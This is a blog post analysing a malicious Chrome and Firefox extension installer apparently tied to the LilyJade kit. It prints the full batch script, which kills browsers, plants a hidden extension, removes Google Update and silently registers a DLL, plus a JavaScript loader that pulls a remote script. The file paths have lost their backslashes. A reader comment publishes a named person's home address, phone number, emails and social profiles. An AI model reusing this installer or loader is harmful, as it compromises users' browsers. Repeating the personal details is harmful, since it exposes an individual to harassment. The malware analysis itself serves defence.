supervids.net (Lilyjade script hiding behind/proxied by cloudflare)

I was looking at some of the files being installed from a recent posting, when I found something interesting. It looks like someone else is trying out lilyjade.

The extensions are held in a self extracting archive and installed via a batch file.

@echo off

//Kill Proccess
TASKKILL /F /IM firefox.exe
TASKKILL /F /IM chrome.exe
TASKKILL /F /IM old_Chrome.exe
TASKKILL /F /IM new_chrome.exe

//Delete Json
DEL %appdata%..LocalGoogleChromeApplication21.0.1180.60default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.60default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.64default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.64default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.64default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.75default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.75default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.77default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.77default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.79default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.79default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.83default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.83default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication21.0.1180.89default_apps*.json
DEL %appdata%LocalGoogleChromeApplication21.0.1180.89default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication22.0.1229.94default_apps*.json
DEL %appdata%LocalGoogleChromeApplication22.0.1229.94default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication22.0.1229.8default_apps*.json
DEL %appdata%LocalGoogleChromeApplication22.0.1229.8default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication23.0.1271.40default_apps*.json
DEL %appdata%LocalGoogleChromeApplication23.0.1271.40default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

DEL %appdata%..LocalGoogleChromeApplication24.0.1297.0default_apps*.json
DEL %appdata%LocalGoogleChromeApplication24.0.1297.0default_apps*.json
DEL C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps*.json

//Copy Json
COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.60default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.60default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.64default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.64default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.64default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.75default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.75default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.75default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.77default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.77default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.77default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.79default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.79default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.79default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.83default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.83default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.83default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication21.0.1180.89default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication21.0.1180.89default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication21.0.1180.89default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication22.0.1229.8default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication22.0.1229.8default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication22.0.1229.8default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication22.0.1229.94default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication22.0.1229.94default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication22.0.1229.94default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication23.0.1271.40default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication23.0.1271.40default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication23.0.1271.40default_apps

COPY external_extensions.json %appdata%..LocalGoogleChromeApplication24.0.1297.0default_apps
COPY external_extensions.json %appdata%LocalGoogleChromeApplication24.0.1297.0default_apps
COPY external_extensions.json C:PROGRA~1GoogleChromeApplication24.0.1297.0default_apps

//Copy Crx To Json Folder
COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.60default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.60default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.60default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.64default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.64default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.64default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.75default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.75default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.75default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.77default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.77default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.77default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.79default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.79default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.79default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.83default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.83default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.83default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication21.0.1180.89default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication21.0.1180.89default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication21.0.1180.89default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication22.0.1229.8default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication22.0.1229.8default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication22.0.1229.8default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication22.0.1229.94default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication22.0.1229.94default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication22.0.1229.94default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication23.0.1271.40default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication23.0.1271.40default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication23.0.1271.40default_apps

COPY secure2.crx %appdata%..LocalGoogleChromeApplication24.0.1297.0default_apps
COPY secure2.crx %appdata%LocalGoogleChromeApplication24.0.1297.0default_apps
COPY secure2.crx C:PROGRA~1GoogleChromeApplication24.0.1297.0default_apps

//Copy Chrome Extension
COPY secure2.crx C:
ATTRIB C:*.crx +H

//Create Firefox Directories
MD C:Macromedia
MD C:Macromediacontent
MD C:Macromediacontentskin

//Add Firefox Files
COPY install.rdf C:Macromedia
COPY chrome.manifest C:Macromedia
COPY External.js C:Macromediacontent
COPY prefman.js C:Macromediacontent
COPY script-compiler.js C:Macromediacontent
COPY script-compiler-overlay.xul C:Macromediacontent
COPY xmlhttprequester.js C:Macromediacontent
COPY youtube.js C:Macromediacontent
COPY icon.png C:Macromediacontentskin

REGEDIT.EXE /S Install.REG

//Remove Update
RD /S /Q %appdata%..LocalGoogleUpdate
RD /S /Q %appdata%LocalGoogleUpdate
RD /S /Q C:PROGRA~1GoogleUpdate

//Copy IE Plugin
COPY FlashUpdates.dll %AppData%
COPY FlashUpdates.dll %AppData%..
COPY FlashUpdates.dll C:WindowsSystem32

CD %AppData%
regsvr32 /s FlashUpdates.dll
CD %AppData%..
regsvr32 /s FlashUpdates.dll
CD C:WindowsSystem32
regsvr32 /s FlashUpdates.dll

EXIT

The batch file attempts to install the extension for firefox and chrome. I assume FlashUpdates.dll is something similar for internet explorer, but I can’t be bothered to check. The installer pops up a cmd window while installing, which might be a bit of a giveaway that something suspicious is going on.

This might raise a few questions as well

Here is the .js loading part of the extension.

(function () {
    var matrix = document.createElement("script");
    matrix.async = true;
    matrix.src = "http://supervids.net/scripts/main.js";
    document.getElementsByTagName("head")[0].appendChild(matrix);
})();

Paste the script from the website into jsbeautifier.org to make it readable.
The facebook and twitter spreading parts of the script appear to have been removed.

Adsense id: ca-pub-3323398805584771
Amazon widget id: V20070822/US/enz-20/8001/25a54e74-2ee7-4e6c-8e3c-bd913fdcec00
Amung.us id: pyhtfdyeccx0
Google analytics id: UA-10493018-2

As usual with lilyjade, you can change three or four values in a text editor and make it your own.

Sample

Script mirrored here: http://pastebin.com/svzRWCDJ

2 Comments

Anonymous - October 28, 2012 at 10:08 am

First Name: Dru
Lastname:Mundroff
Cell Phone: 1+6023304500
Address: 17425 N. 19th Ave, 2159 Phoenix, AZ 85032 US
Emails: MMOCode@Gmail.com, DruMundroff@Yahoo.com
Facebook Profile: http://www.facebook.com/CodesComp
Twitter Profile: http://twitter.com/CodeCompiler
LinkedIN Profile: http://www.linkedin.com/pub/dru-mundorff/16/556/560
School Information: Paradise Valley High School
School year: 2002
Location: Phoenix, Arizona
School Grades: Yes we even have these ready to be added.

The Cellphone still works, Paypal is been used out of the mmocode@gmail.com

Anonymous - October 29, 2012 at 6:58 pm

Reply from 69.42.87.101: bytes=32 time=113ms TTL=54
Reply from 69.42.87.101: bytes=32 time=107ms TTL=54
Reply from 69.42.87.101: bytes=32 time=98ms TTL=54
Reply from 69.42.87.101: bytes=32 time=107ms TTL=54

Lilyjade.org behind cloudflare

videotr.in (Facebook spreading browser extension proxied by cloudflare)

LilyJade again

lilyjadev2.com (Malicious browser extension Hosted in the United States by Endicott H4y Technologies Llc)

2 Comments

Anonymous - October 28, 2012 at 10:08 am

Anonymous - October 29, 2012 at 6:58 pm

Comments are closed